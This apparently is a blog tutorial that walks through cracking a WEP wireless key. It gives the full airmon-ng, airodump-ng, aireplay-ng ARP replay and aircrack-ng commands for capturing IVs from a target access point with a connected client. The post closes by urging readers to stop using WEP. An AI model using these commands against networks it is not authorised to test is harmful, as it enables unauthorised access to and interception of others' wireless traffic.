Crack WEP key with a Connected Client

In this attack scenario, the topology includes an Access Point and at least one connected client. The idea is to collect a large number of encrypted packets and the corresponding Initialisation Vectors, you can apply statistical methods and guess the WEP encryption key.

Steps:

Create a monitoring interface with the following command:

airmon-ng start INTERFACE

Identify the target network using Airodump-ng:

airodump-ng MONITOR_INTERFACE

It’s a good practice to put the WNIC (Wireless Network Interface Card) to the same channel as with the target Access Point.

ifconfig INTERFACE down
iwconfig INTERFACE channel CHANNEL
ifconfig INTERFACE up

Now, we need to capture the packets and store them:

airodump-ng —-bssid TARGET_AP_MAC —-channel CHANNEL  —-write FILE_NAME MONITOR_INTERFACE

In order to increase the number of Data frames, we’ll launch an ARP replay attack:

aireplay-ng -3 -b TARGET_AP_MAC -h CLIENT_MAC MONITOR_INTERFACE

After capturing enough IVs (around 60k should be enough), we can start cracking the WEP key:

aircrack-ng FILE_NAME.cap

Always have in mind that you should AVOID using WEP encryption. Wired Equivalent Privacy provides no security and should not be used. It’s good to see, people starting to realize the importance of this. I haven’t seen WEP in a while, which means people start to realize the importance of wireless security. Next, I’m planning to write about more advanced topics, like attacking WPA2 and KRACK. Stay tuned!

Before you go

Thank you for taking the time to read my article. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏